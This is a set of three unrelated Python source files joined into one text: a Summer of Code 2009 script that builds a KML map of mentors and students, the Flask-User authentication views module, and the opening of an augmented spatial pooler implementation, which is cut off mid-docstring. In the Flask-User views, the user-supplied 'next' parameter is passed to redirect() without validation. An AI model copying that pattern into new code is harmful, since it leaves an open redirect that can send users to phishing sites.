returns a name to be displayed. """ return entity.name() def _getMentorDescription(doc, content): """Returns <description> element for a mentor / org admin based on content. """ description = doc.createElement('description') admin = content['admin'] if admin: text = doc.createTextNode('Organization admin for ' + admin) description.appendChild(text) description.appendChild(doc.createElement('br')) projects = content['projects'] if projects: text = doc.createTextNode('Mentoring...') description.appendChild(text) description.appendChild(doc.createElement('br')) for project in projects: i = doc.createElement('i') description.appendChild(i) title = doc.createTextNode(project['title']) i.appendChild(title) description.appendChild(doc.createElement('br')) student = doc.createTextNode('by ' + project['student']) description.appendChild(student) description.appendChild(doc.createElement('br')) organization = doc.createTextNode(project['org']) description.appendChild(organization) description.appendChild(doc.createElement('br')) consults = content['consults'] for consult in consults: text = doc.createTextNode(consult) description.appendChild(text) description.appendChild(doc.createElement('br')) description.appendChild(doc.createElement('br')) home_pages = content['home_pages'] blogs = content['blogs'] description = _appendHomePageAndBlogContent(doc, description, home_pages, blogs) state = content['state'] country = content['country'] description = _appendStateAndCountryContnent(doc, description, state, country) return description def _getStudentDescription(doc, content): """Returns <description> element for a student based on content. """ description = doc.createElement('description') text = doc.createTextNode('Working on...') description.appendChild(text) description.appendChild(doc.createElement('br')) project = content['project'] i = doc.createElement('i') description.appendChild(i) title = doc.createTextNode(project.title) i.appendChild(title) description.appendChild(doc.createElement('br')) mentor = doc.createTextNode('mentored by ' + project.mentor.name()) description.appendChild(mentor) description.appendChild(doc.createElement('br')) org = doc.createTextNode(project.scope.name) description.appendChild(org) description.appendChild(doc.createElement('br')) description.appendChild(doc.createElement('br')) home_pages = content['home_pages'] blogs = content['blogs'] description = _appendHomePageAndBlogContent(doc, description, home_pages, blogs) state = content['state'] country = content['country'] description = _appendStateAndCountryContnent(doc, description, state, country) return description def _createFolderForMentorsAndOrgAdmins(doc): """ """ folder = doc.createElement("Folder") name = doc.createElement("name") folder.appendChild(name) nametext = doc.createTextNode("Mentors") name.appendChild(nametext) return folder def _createLineString(doc, student, mentor): """Generates line string between a given student and mentor. """ line_string = doc.createElement('LineString') coordinates = doc.createElement('coordinates') line_string.appendChild(coordinates) text = doc.createTextNode(str(student[0]) + ',' + str(student[1]) + ' ' + str(mentor[0]) + ',' + str(mentor[1])) coordinates.appendChild(text) altitude_mode = doc.createElement('altitudeMode') line_string.appendChild(altitude_mode) text = doc.createTextNode('clampToGround') altitude_mode.appendChild(text) extrude = doc.createElement('extrude') line_string.appendChild(extrude) text = doc.createTextNode('1') extrude.appendChild(text) tessellate = doc.createElement('tessellate') line_string.appendChild(tessellate) text = doc.createTextNode('1') tessellate.appendChild(text) return line_string def _createPoint(doc, longitude, latitude): """Generates <Point> subtree with coordinates for a given entity. """ point = doc.createElement('Point') coordinates = doc.createElement('coordinates') point.appendChild(coordinates) text = doc.createTextNode(str(longitude) + ',' + str(latitude)) coordinates.appendChild(text) return point def _createStudentPlacemark(doc, coordinates, content): """Creates <Placemark> element for a student based on a given content. """ placemark = doc.createElement('Placemark') style = _getPersonStyle(doc, 'student') placemark.appendChild(style) name = doc.createElement('name') placemark.appendChild(name) text = doc.createTextNode(content['name']) name.appendChild(text) description = _getStudentDescription(doc, content) placemark.appendChild(description) point = _createPoint(doc, coordinates[0], coordinates[1]) placemark.appendChild(point) return placemark def _createMentorPlacemark(doc, coordinates, content): """Creates <Placemark> element for a mentor based on a given content. """ placemark = doc.createElement('Placemark') type = 'org_admin' if content['admin'] is not None else 'mentor' style = _getPersonStyle(doc, type) placemark.appendChild(style) name = doc.createElement('name') placemark.appendChild(name) text = doc.createTextNode(content['name']) name.appendChild(text) description = _getMentorDescription(doc, content) placemark.appendChild(description) point = _createPoint(doc, coordinates[0], coordinates[1]) placemark.appendChild(point) return placemark def _createLineStringPlacemark(doc, student_coordinates, mentor_coordinates): """Creates <Placemark> element for a line string between given student coordinates and mentor coordinates. """ placemark = doc.createElement('Placemark') line_string = _createLineString(doc, student_coordinates, mentor_coordinates) placemark.appendChild(line_string) style = _getLineStringStyle(doc) placemark.appendChild(style) return placemark def _processMentor(doc, org_admin, mentors, folder): """Processes a student and adds information to a folder. """ projects = [] placemarks = {} longitude = None latitude = None for entity in mentors: if not entity.publish_location: continue longitude, latitude = (entity.longitude, entity.latitude) if not placemarks.get((longitude, latitude)): placemarks[(longitude, latitude)] = { 'admin': None, 'projects': [], 'consults': [], 'name': entity.name(), 'country': entity.res_country, 'state': entity.res_state, 'home_pages': set(), 'blogs': set() } projects = _getMentoredProjects(entity) if not projects: placemarks[(longitude, latitude)]['consults'].append( 'Mentor for ' + entity.scope.name) else: for project in projects: placemarks[(longitude, latitude)]['projects'].append({ 'title': project.title, 'org': project.scope.name, 'student': project.student.name() }) if entity.home_page: placemarks[(longitude, latitude)]['home_pages'].add(entity.home_page) if entity.blog: placemarks[(longitude, latitude)]['blogs'].add(entity.blog) if org_admin and org_admin.publish_location: if not (longitude, latitude): longitude, latitude = (org_admin.longitude, org_admin.latitude) if not placemarks.get((longitude, latitude)): placemarks[(longitude, latitude)] = { 'admin': None, 'projects': [], 'consults': [], 'name': org_admin.name(), 'country': org_admin.res_country, 'state': org_admin.res_state, 'home_pages': set(), 'blogs': set() } placemarks[(longitude, latitude)]['admin'] = org_admin.scope.name if org_admin.home_page: placemarks[(longitude, latitude)]['home_pages'].add(org_admin.home_page) if org_admin.blog: placemarks[(longitude, latitude)]['blogs'].add(org_admin.blog) for coordinates, content in placemarks.iteritems(): placemark = _createMentorPlacemark(doc, coordinates, content) folder.appendChild(placemark) def _processStudent(doc, student, orgs_folder): """Processes a student and adds information to a folder. """ if not student.publish_location: return project = _getStudentProject(student) if not project: return folder = doc.createElement('Folder') name = doc.createElement('name') folder.appendChild(name) name.appendChild(doc.createTextNode(student.name())) content = { 'name': student.name(), 'project': project, 'country': student.res_country, 'state': student.res_state, 'home_pages': [student.home_page] if student.home_page else [], 'blogs': [student.blog] if student.blog else [] } coordinates = student.longitude, student.latitude placemark = _createStudentPlacemark(doc, coordinates, content) folder.appendChild(placemark) mentor = project.mentor if mentor.publish_location: mentor_coordinates = mentor.longitude, mentor.latitude line_string = _createLineStringPlacemark(doc, coordinates, mentor_coordinates) folder.appendChild(line_string) org = project.scope org_folder = orgs_folder[org.name] org_folder.appendChild(folder) def _processAllUsers(doc, mentors_folder, orgs_folder): """Processes all users and fills folders with information based on roles. """ from soc.logic.models.mentor import logic as mentor_logic from soc.logic.models.org_admin import logic as org_admin_logic from soc.logic.models.student import logic as student_logic it = _getAllOrgAdmins() org_admins = dict() for org_admin in it: org_admins[org_admin.link_id] = org_admin it = _getAllMentors() mentors = dict() for mentor in it: link_id = mentor.link_id if link_id not in mentors: mentors[link_id] = [] mentors[link_id].append(mentor) it = _getAllStudents() students = dict() for student in it: students[student.link_id] = student link_ids = set(mentors.keys() + org_admins.keys()) for link_id in link_ids: entity = org_admins.get(link_id) entities = mentors.get(link_id, []) if entity or entities: _processMentor(doc, entity, entities, mentors_folder) continue link_ids = students.keys() for link_id in link_ids: entity = students.get(link_id) if entity: _processStudent(doc, entity, orgs_folder) def _createFolderForStudentsAndOrgs(doc): """Creates <Folder> elements for all students and for all accepted organizations. Returns: A tuple whose first element is a folder for students and the second one is a dictionary mapping organization names with their folders. """ folder = doc.createElement('Folder') name = doc.createElement('name') folder.appendChild(name) text = doc.createTextNode('Students') name.appendChild(text) orgs = _getAcceptedOrgs() org_folders = {} for org in orgs: org_folder = doc.createElement('Folder') folder.appendChild(org_folder) name = doc.createElement('name') org_folder.appendChild(name) text = doc.createTextNode(org.name) name.appendChild(text) org_folders[org.name] = org_folder return folder, org_folders def generateCompleteKML(): """Generates complete KML file for Google Summer of Code 2009. """ doc = Document() kml = doc.createElement('kml') doc.appendChild(kml) document = doc.createElement('Document') kml.appendChild(document) mentor_folder = _createFolderForMentorsAndOrgAdmins(doc) document.appendChild(mentor_folder) student_folder, org_folders = _createFolderForStudentsAndOrgs(doc) document.appendChild(student_folder) _processAllUsers(doc, mentor_folder, org_folders) out = codecs.open('soc_map2009.kml', 'w', 'utf-8') out.write(doc.toprettyxml(indent=' ')) out.close() def main(args): context = { 'export': generateCompleteKML, } interactive.setup() interactive.remote(args, context) if __name__ == '__main__': if len(sys.argv) < 2: print "Usage: %s app_id [host]" % (sys.argv[0],) sys.exit(1) main(sys.argv[1:])
""" This file contains view functions for Flask-User forms. :copyright: (c) 2013 by Ling Thio :author: Ling Thio (ling.thio@gmail.com) :license: Simplified BSD License, see LICENSE.txt for more details.""" from datetime import datetime from flask import current_app, flash, redirect, render_template, request, url_for from flask_login import current_user, login_user, logout_user try: # Handle Python 2.x and Python 3.x from urllib.parse import quote # Python 3.x except ImportError: from urllib import quote # Python 2.x from .decorators import confirm_email_required, login_required from . import emails from . import signals from .translations import gettext as _ def confirm_email(token): """ Verify email confirmation token and activate the user account.""" # Verify token user_manager = current_app.user_manager db_adapter = user_manager.db_adapter is_valid, has_expired, object_id = user_manager.verify_token( token, user_manager.confirm_email_expiration) if has_expired: flash(_('Your confirmation token has expired.'), 'error') return redirect(url_for('user.login')) if not is_valid: flash(_('Invalid confirmation token.'), 'error') return redirect(url_for('user.login')) # Confirm email by setting User.active=True and User.confirmed_at=utcnow() if db_adapter.UserEmailClass: user_email = user_manager.get_user_email_by_id(object_id) if user_email: user_email.confirmed_at = datetime.utcnow() user = user_email.user else: user = None else: user_email = None user = user_manager.get_user_by_id(object_id) if user: user.confirmed_at = datetime.utcnow() if user: user.set_active(True) db_adapter.commit() else: # pragma: no cover flash(_('Invalid confirmation token.'), 'error') return redirect(url_for('user.login')) # Send email_confirmed signal signals.user_confirmed_email.send(current_app._get_current_object(), user=user) # Prepare one-time system message flash(_('Your email has been confirmed.'), 'success') # Auto-login after confirm or redirect to login page next = request.args.get('next', _endpoint_url(user_manager.after_confirm_endpoint)) if user_manager.auto_login_after_confirm: return _do_login_user(user, next) # auto-login else: return redirect(url_for('user.login')+'?next='+next) # redirect to login page @login_required @confirm_email_required def change_password(): """ Prompt for old password and new password and change the user's password.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Initialize form form = user_manager.change_password_form(request.form) form.next.data = request.args.get('next', _endpoint_url(user_manager.after_change_password_endpoint)) # Place ?next query param in next form field # Process valid POST if request.method=='POST' and form.validate(): # Hash password hashed_password = user_manager.hash_password(form.new_password.data) # Change password user_manager.update_password(current_user, hashed_password) # Send 'password_changed' email if user_manager.enable_email and user_manager.send_password_changed_email: emails.send_password_changed_email(current_user) # Send password_changed signal signals.user_changed_password.send(current_app._get_current_object(), user=current_user) # Prepare one-time system message flash(_('Your password has been changed successfully.'), 'success') # Redirect to 'next' URL return redirect(form.next.data) # Process GET or invalid POST return render_template(user_manager.change_password_template, form=form) @login_required @confirm_email_required def change_username(): """ Prompt for new username and old password and change the user's username.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Initialize form form = user_manager.change_username_form(request.form) form.next.data = request.args.get('next', _endpoint_url(user_manager.after_change_username_endpoint)) # Place ?next query param in next form field # Process valid POST if request.method=='POST' and form.validate(): new_username = form.new_username.data # Change username user_auth = current_user.user_auth if db_adapter.UserAuthClass and hasattr(current_user, 'user_auth') else current_user db_adapter.update_object(user_auth, username=new_username) db_adapter.commit() # Send 'username_changed' email if user_manager.enable_email and user_manager.send_username_changed_email: emails.send_username_changed_email(current_user) # Send username_changed signal signals.user_changed_username.send(current_app._get_current_object(), user=current_user) # Prepare one-time system message flash(_("Your username has been changed to '%(username)s'.", username=new_username), 'success') # Redirect to 'next' URL return redirect(form.next.data) # Process GET or invalid POST return render_template(user_manager.change_username_template, form=form) @login_required @confirm_email_required def email_action(id, action): """ Perform action 'action' on UserEmail object 'id' """ user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Retrieve UserEmail by id user_email = db_adapter.find_first_object(db_adapter.UserEmailClass, id=id) # Users may only change their own UserEmails if not user_email or user_email.user_id != int(current_user.get_id()): return unauthorized() if action=='delete': # Primary UserEmail can not be deleted if user_email.is_primary: return unauthorized() # Delete UserEmail db_adapter.delete_object(user_email) db_adapter.commit() elif action=='make-primary': # Disable previously primary emails user_emails = db_adapter.find_all_objects(db_adapter.UserEmailClass, user_id=int(current_user.get_id())) for ue in user_emails: if ue.is_primary: ue.is_primary = False # Enable current primary email user_email.is_primary = True # Commit db_adapter.commit() elif action=='confirm': _send_confirm_email(user_email.user, user_email) else: return unauthorized() return redirect(url_for('user.manage_emails')) def forgot_password(): """Prompt for email and send reset password email.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Initialize form form = user_manager.forgot_password_form(request.form) # Process valid POST if request.method=='POST' and form.validate(): email = form.email.data # Find user by email user, user_email = user_manager.find_user_by_email(email) if user: # Generate reset password link token = user_manager.generate_token(int(user.get_id())) reset_password_link = url_for('user.reset_password', token=token, _external=True) # Send forgot password email emails.send_forgot_password_email(user, user_email, reset_password_link) # Store token if hasattr(user, 'reset_password_token'): db_adapter.update_object(user, reset_password_token=token) db_adapter.commit() # Send forgot_password signal signals.user_forgot_password.send(current_app._get_current_object(), user=user) # Prepare one-time system message flash(_("A reset password email has been sent to '%(email)s'. Open that email and follow the instructions to reset your password.", email=email), 'success') # Redirect to the login page return redirect(_endpoint_url(user_manager.after_forgot_password_endpoint)) # Process GET or invalid POST return render_template(user_manager.forgot_password_template, form=form) def login(): """ Prompt for username/email and password and sign the user in.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter next = request.args.get('next', _endpoint_url(user_manager.after_login_endpoint)) reg_next = request.args.get('reg_next', _endpoint_url(user_manager.after_register_endpoint)) # Immediately redirect already logged in users if current_user.is_authenticated() and user_manager.auto_login_at_login: return redirect(next) # Initialize form login_form = user_manager.login_form(request.form) # for login.html register_form = user_manager.register_form() # for login_or_register.html if request.method!='POST': login_form.next.data = register_form.next.data = next login_form.reg_next.data = register_form.reg_next.data = reg_next # Process valid POST if request.method=='POST' and login_form.validate(): # Retrieve User user = None user_email = None if user_manager.enable_username: # Find user record by username user = user_manager.find_user_by_username(login_form.username.data) user_email = None # Find primary user_email record if user and db_adapter.UserEmailClass: user_email = db_adapter.find_first_object(db_adapter.UserEmailClass, user_id=int(user.get_id()), is_primary=True, ) # Find user record by email (with form.username) if not user and user_manager.enable_email: user, user_email = user_manager.find_user_by_email(login_form.username.data) else: # Find user by email (with form.email) user, user_email = user_manager.find_user_by_email(login_form.email.data) if user: # Log user in return _do_login_user(user, login_form.next.data, login_form.remember_me.data) # Process GET or invalid POST return render_template(user_manager.login_template, form=login_form, login_form=login_form, register_form=register_form) def logout(): """ Sign the user out.""" user_manager = current_app.user_manager # Send user_logged_out signal signals.user_logged_out.send(current_app._get_current_object(), user=current_user) # Use Flask-Login to sign out user logout_user() # Prepare one-time system message flash(_('You have signed out successfully.'), 'success') # Redirect to logout_next endpoint or '/' next = request.args.get('next', _endpoint_url(user_manager.after_logout_endpoint)) # Get 'next' query param return redirect(next) @login_required @confirm_email_required def manage_emails(): user_manager = current_app.user_manager db_adapter = user_manager.db_adapter user_emails = db_adapter.find_all_objects(db_adapter.UserEmailClass, user_id=int(current_user.get_id())) form = user_manager.add_email_form() # Process valid POST request if request.method=="POST" and form.validate(): user_emails = db_adapter.add_object(db_adapter.UserEmailClass, user_id=int(current_user.get_id()), email=form.email.data) db_adapter.commit() return redirect(url_for('user.manage_emails')) # Process GET or invalid POST request return render_template(user_manager.manage_emails_template, user_emails=user_emails, form=form, ) def register(): """ Display registration form and create new User.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter next = request.args.get('next', _endpoint_url(user_manager.after_login_endpoint)) reg_next = request.args.get('reg_next', _endpoint_url(user_manager.after_register_endpoint)) # Initialize form login_form = user_manager.login_form() # for login_or_register.html register_form = user_manager.register_form(request.form) # for register.html # invite token used to determine validity of registeree invite_token = request.values.get("token") # require invite without a token should disallow the user from registering if user_manager.require_invitation and not invite_token: flash("Registration is invite only", "error") return redirect(url_for('user.login')) user_invite = None if invite_token and db_adapter.UserInvitationClass: user_invite = db_adapter.find_first_object(db_adapter.UserInvitationClass, token=invite_token) if user_invite: register_form.invite_token.data = invite_token if request.method!='POST': login_form.next.data = register_form.next.data = next login_form.reg_next.data = register_form.reg_next.data = reg_next if user_invite: register_form.email.data = user_invite.email # Process valid POST if request.method=='POST' and register_form.validate(): # Create a User object using Form fields that have a corresponding User field User = db_adapter.UserClass user_class_fields = User.__dict__ user_fields = {} # Create a UserEmail object using Form fields that have a corresponding UserEmail field if db_adapter.UserEmailClass: UserEmail = db_adapter.UserEmailClass user_email_class_fields = UserEmail.__dict__ user_email_fields = {} # Create a UserAuth object using Form fields that have a corresponding UserAuth field if db_adapter.UserAuthClass: UserAuth = db_adapter.UserAuthClass user_auth_class_fields = UserAuth.__dict__ user_auth_fields = {} # Enable user account if db_adapter.UserProfileClass: if hasattr(db_adapter.UserProfileClass, 'active'): user_auth_fields['active'] = True elif hasattr(db_adapter.UserProfileClass, 'is_enabled'): user_auth_fields['is_enabled'] = True else: user_auth_fields['is_active'] = True else: if hasattr(db_adapter.UserClass, 'active'): user_fields['active'] = True elif hasattr(db_adapter.UserClass, 'is_enabled'): user_fields['is_enabled'] = True else: user_fields['is_active'] = True # For all form fields for field_name, field_value in register_form.data.items(): # Hash password field if field_name=='password': hashed_password = user_manager.hash_password(field_value) if db_adapter.UserAuthClass: user_auth_fields['password'] = hashed_password else: user_fields['password'] = hashed_password # Store corresponding Form fields into the User object and/or UserProfile object else: if field_name in user_class_fields: user_fields[field_name] = field_value if db_adapter.UserEmailClass: if field_name in user_email_class_fields: user_email_fields[field_name] = field_value if db_adapter.UserAuthClass: if field_name in user_auth_class_fields: user_auth_fields[field_name] = field_value # Add User record using named arguments 'user_fields' user = db_adapter.add_object(User, **user_fields) if db_adapter.UserProfileClass: user_profile = user # Add UserEmail record using named arguments 'user_email_fields' if db_adapter.UserEmailClass: user_email = db_adapter.add_object(UserEmail, user=user, is_primary=True, **user_email_fields) else: user_email = None # Add UserAuth record using named arguments 'user_auth_fields' if db_adapter.UserAuthClass: user_auth = db_adapter.add_object(UserAuth, **user_auth_fields) if db_adapter.UserProfileClass: user = user_auth else: user.user_auth = user_auth require_email_confirmation = True if user_invite: if user_invite.email == register_form.email.data: require_email_confirmation = False db_adapter.update_object(user, confirmed_at=datetime.utcnow()) db_adapter.commit() # Send 'registered' email and delete new User object if send fails if user_manager.send_registered_email: try: # Send 'registered' email _send_registered_email(user, user_email, require_email_confirmation) except Exception as e: # delete new User object if send fails db_adapter.delete_object(user) db_adapter.commit() raise e # Send user_registered signal signals.user_registered.send(current_app._get_current_object(), user=user, user_invite=user_invite) # Redirect if USER_ENABLE_CONFIRM_EMAIL is set if user_manager.enable_confirm_email and require_email_confirmation: next = request.args.get('next', _endpoint_url(user_manager.after_register_endpoint)) return redirect(next) # Auto-login after register or redirect to login page next = request.args.get('next', _endpoint_url(user_manager.after_confirm_endpoint)) if user_manager.auto_login_after_register: return _do_login_user(user, reg_next) # auto-login else: return redirect(url_for('user.login')+'?next='+reg_next) # redirect to login page # Process GET or invalid POST return render_template(user_manager.register_template, form=register_form, login_form=login_form, register_form=register_form) @login_required def invite(): """ Allows users to send invitations to register an account """ user_manager = current_app.user_manager db_adapter = user_manager.db_adapter next = request.args.get('next', _endpoint_url(user_manager.after_invite_endpoint)) invite_form = user_manager.invite_form(request.form) if request.method=='POST' and invite_form.validate(): email = invite_form.email.data User = db_adapter.UserClass user_class_fields = User.__dict__ user_fields = { "email": email } user, user_email = user_manager.find_user_by_email(email) if user: flash("User with that email has already registered", "error") return redirect(url_for('user.invite')) else: user_invite = db_adapter \ .add_object(db_adapter.UserInvitationClass, **{ "email": email, "invited_by_user_id": current_user.id }) db_adapter.commit() token = user_manager.generate_token(user_invite.id) accept_invite_link = url_for('user.register', token=token, _external=True) # Store token if hasattr(db_adapter.UserInvitationClass, 'token'): user_invite.token = token db_adapter.commit() try: # Send 'invite' email emails.send_invite_email(user_invite, accept_invite_link) except Exception as e: # delete new User object if send fails db_adapter.delete_object(user_invite) db_adapter.commit() raise e signals \ .user_sent_invitation \ .send(current_app._get_current_object(), user_invite=user_invite) flash(_('Invitation has been sent.'), 'success') return redirect(next) return render_template(user_manager.invite_template, form=invite_form) def resend_confirm_email(): """Prompt for email and re-send email conformation email.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Initialize form form = user_manager.resend_confirm_email_form(request.form) # Process valid POST if request.method=='POST' and form.validate(): email = form.email.data # Find user by email user, user_email = user_manager.find_user_by_email(email) if user: _send_confirm_email(user, user_email) # Redirect to the login page return redirect(_endpoint_url(user_manager.after_resend_confirm_email_endpoint)) # Process GET or invalid POST return render_template(user_manager.resend_confirm_email_template, form=form) def reset_password(token): """ Verify the password reset token, Prompt for new password, and set the user's password.""" # Verify token user_manager = current_app.user_manager db_adapter = user_manager.db_adapter is_valid, has_expired, user_id = user_manager.verify_token( token, user_manager.reset_password_expiration) if has_expired: flash(_('Your reset password token has expired.'), 'error') return redirect(url_for('user.login')) if not is_valid: flash(_('Your reset password token is invalid.'), 'error') return redirect(url_for('user.login')) user = user_manager.get_user_by_id(user_id) if user: # Avoid re-using old tokens if hasattr(user, 'reset_password_token'): verified = user.reset_password_token == token else: verified = True if not user or not verified: flash(_('Your reset password token is invalid.'), 'error') return redirect(_endpoint_url(user_manager.login_endpoint)) # Initialize form form = user_manager.reset_password_form(request.form) # Process valid POST if request.method=='POST' and form.validate(): # Invalidate the token by clearing the stored token if hasattr(user, 'reset_password_token'): db_adapter.update_object(user, reset_password_token='') # Change password hashed_password = user_manager.hash_password(form.new_password.data) user_auth = user.user_auth if db_adapter.UserAuthClass and hasattr(user, 'user_auth') else user db_adapter.update_object(user_auth, password=hashed_password) db_adapter.commit() # Send 'password_changed' email if user_manager.enable_email and user_manager.send_password_changed_email: emails.send_password_changed_email(user) # Prepare one-time system message flash(_("Your password has been reset successfully. Please sign in with your new password"), 'success') # Auto-login after reset password or redirect to login page next = request.args.get('next', _endpoint_url(user_manager.after_reset_password_endpoint)) if user_manager.auto_login_after_reset_password: return _do_login_user(user, next) # auto-login else: return redirect(url_for('user.login')+'?next='+next) # redirect to login page # Process GET or invalid POST return render_template(user_manager.reset_password_template, form=form) def unconfirmed(): """ Prepare a Flash message and redirect to USER_UNCONFIRMED_ENDPOINT""" # Prepare Flash message url = request.script_root + request.path flash(_("You must confirm your email to access '%(url)s'.", url=url), 'error') # Redirect to USER_UNCONFIRMED_EMAIL_ENDPOINT user_manager = current_app.user_manager return redirect(_endpoint_url(user_manager.unconfirmed_email_endpoint)) def unauthenticated(): """ Prepare a Flash message and redirect to USER_UNAUTHENTICATED_ENDPOINT""" # Prepare Flash message url = request.url flash(_("You must be signed in to access '%(url)s'.", url=url), 'error') # quote the fully qualified url quoted_url = quote(url) # Redirect to USER_UNAUTHENTICATED_ENDPOINT user_manager = current_app.user_manager return redirect(_endpoint_url(user_manager.unauthenticated_endpoint)+'?next='+ quoted_url) def unauthorized(): """ Prepare a Flash message and redirect to USER_UNAUTHORIZED_ENDPOINT""" # Prepare Flash message url = request.script_root + request.path flash(_("You do not have permission to access '%(url)s'.", url=url), 'error') # Redirect to USER_UNAUTHORIZED_ENDPOINT user_manager = current_app.user_manager return redirect(_endpoint_url(user_manager.unauthorized_endpoint)) @login_required @confirm_email_required def user_profile(): user_manager = current_app.user_manager return render_template(user_manager.user_profile_template) def _send_registered_email(user, user_email, require_email_confirmation=True): user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Send 'confirm_email' or 'registered' email if user_manager.enable_email and user_manager.enable_confirm_email: # Generate confirm email link object_id = user_email.id if user_email else int(user.get_id()) token = user_manager.generate_token(object_id) confirm_email_link = url_for('user.confirm_email', token=token, _external=True) # Send email emails.send_registered_email(user, user_email, confirm_email_link) # Prepare one-time system message if user_manager.enable_confirm_email and require_email_confirmation: email = user_email.email if user_email else user.email flash(_('A confirmation email has been sent to %(email)s with instructions to complete your registration.', email=email), 'success') else: flash(_('You have registered successfully.'), 'success') def _send_confirm_email(user, user_email): user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Send 'confirm_email' or 'registered' email if user_manager.enable_email and user_manager.enable_confirm_email: # Generate confirm email link object_id = user_email.id if user_email else int(user.get_id()) token = user_manager.generate_token(object_id) confirm_email_link = url_for('user.confirm_email', token=token, _external=True) # Send email emails.send_confirm_email_email(user, user_email, confirm_email_link) # Prepare one-time system message email = user_email.email if user_email else user.email flash(_('A confirmation email has been sent to %(email)s with instructions to complete your registration.', email=email), 'success') def _do_login_user(user, next, remember_me=False): # User must have been authenticated if not user: return unauthenticated() # Check if user account has been disabled if not user.is_active(): flash(_('Your account has not been enabled.'), 'error') return redirect(url_for('user.home')) # Check if user has a confirmed email address user_manager = current_app.user_manager if user_manager.enable_email and user_manager.enable_confirm_email \ and not current_app.user_manager.enable_login_without_confirm_email \ and not user.has_confirmed_email(): url = url_for('user.resend_confirm_email') flash(_('Your email address has not yet been confirmed. Check your email Inbox and Spam folders for the confirmation email or <a href="%(url)s">Re-send confirmation email</a>.', url=url), 'error') return redirect(url_for('user.home')) # Use Flask-Login to sign in user #print('login_user: remember_me=', remember_me) login_user(user, remember=remember_me) # Send user_logged_in signal signals.user_logged_in.send(current_app._get_current_object(), user=user) # Prepare one-time system message flash(_('You have signed in successfully.'), 'success') # Redirect to 'next' URL return redirect(next) def _endpoint_url(endpoint): url = '/' if endpoint: url = url_for(endpoint) return url
#!/usr/bin/env python """ ================================LICENSE====================================== Copyright (c) 2015 Chirag Mello & Mario Tambos Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================LICENSE====================================== Implementation of the augmented spatial pooler according to: Thornton, John, and Andrew Srbic. "Spatial pooling for greyscale images." International Journal of Machine Learning and Cybernetics 4, no. 3 (2013): 207-216. A region is represented by a 4-dimensional numpy array **columns**, such that: columns[i, j, k, l] == v in [0, 1) => the column mapped to thecoordinates [i, j] has a *potential* synapse to coordinates [k, l] with permanence v Another way of thinking about it is that **columns** is a 2-dimensional array whose elements are columns, and each column is in turn a 2-dimensional array of synapses. """ from __future__ import division, print_function from collections import defaultdict import cPickle as pickle from datetime import datetime from functools import partial from pprint import pprint import numpy as np import numexpr as ne from utils import read_input, iter_columns, iter_synapses from common import (update_inhibition_area, calculate_min_activity, inhibit_columns, initialise_synapses, test_for_convergence) from utils import RingBuffer def calculate_overlap(input_vector, columns, min_overlap, connect_threshold, boost): """ Implements the calculateOverlap function from the paper (p. 3). :param input_vector: a single input_vector from the images set. :param columns: the 4-dimensional array of HTM columns: a 4-dimensional array of shape *shape* that represents the HTM columns and their synapses; each element columns[a, b, c, d] contains the permanence value of the synapse connecting the column with coordinates (a, b) to input with coordinates (c, d). :param min_overlap: the BSP's minOverlap parameter (p. 3). Type: float. :param connect_threshold: the BSP's connectThreshold parameter (p. 3). Type: float. :param boost: the BSP's boost matrix (pp. 3, 4). It is a matrix of shape (columns.shape[0], columns.shape[1]) :param overlap_sum: the BSP's overlapSum matrix (p. 4). This parameter is modified and returned. It is a dictionary with tuples (y, x) of HTM column coordinates as keys and deque (a queue implementation) instances as values. The queue for key [a, b] stores a 1 each time the overlap of the column [a, b] was above the minOverlap threshold during the last 1000 iterations. :return: a tuple (overlap, overlap_sum). *overlap* is an array of shape (columns.shape[0], columns.shape[0]); each element overlap[a, b] contains the overlap of the column [a, b] with the input_vector. *overlap_sum* is the parameter of the same name; the queue in overlap_sum[a, b] will have a 1 pushed into it if the overlap for the column [a, b] was above the min_overlap threshold this iteration. """ # Initialize the overlap array. overlap = np.zeros(columns.shape[:2]) # for each column ... for y, x, syn_matrix in iter_columns(columns): # @UnusedVariable c = (y, x) # calculate the overlap as the sum of pixel's values in the # input_vector assigned to *connected* synapses and, ... # (numexpr.evaluate optimizes and carries out the operations defined in # its string argument, it is used here because numpy has some # problems when comparing NaNs with numbers) active_synapses = ne.evaluate('syn_matrix >= connect_threshold') overlap[c] = input_vector[active_synapses].sum() # if the overlap is not enough, ... if overlap[c] < min_overlap: # reset it, but, ... overlap[c] = 0 # if the overlap is enough, ... else: # then boost it. overlap[c] *= boost[c] return overlap def learn_synapse_connections(columns, active, input_vector, p_inc, p_dec, activity, min_activity, boost, b_inc, p_mult, connect_threshold, distances, b_max): """ Calculates the minActivity matrix from the paper (p. 6). :param columns: the 4-dimensional array of HTM columns: a 4-dimensional array of shape *shape* that represents the HTM columns and their synapses; each element columns[a, b, c, d] contains the permanence value of the synapse connecting the column with coordinates (a, b) to input with coordinates (c, d). :param active: array of shape (columns.shape[0], columns.shape[0]); each element active[a, b] is True if the column [a, b] is active this iteration and False otherwise. :param input_vector: the input to be learned. A 2-dimensional array of shape (columns.shape[0], columns.shape[1]). :param p_inc: the BSP'perm pInc parameter (p. 4). A float that indicates the amount by which a synapse'perm permanence must be incremented. :param p_dec: the BSP'perm pDec parameter (p. 4). A float that 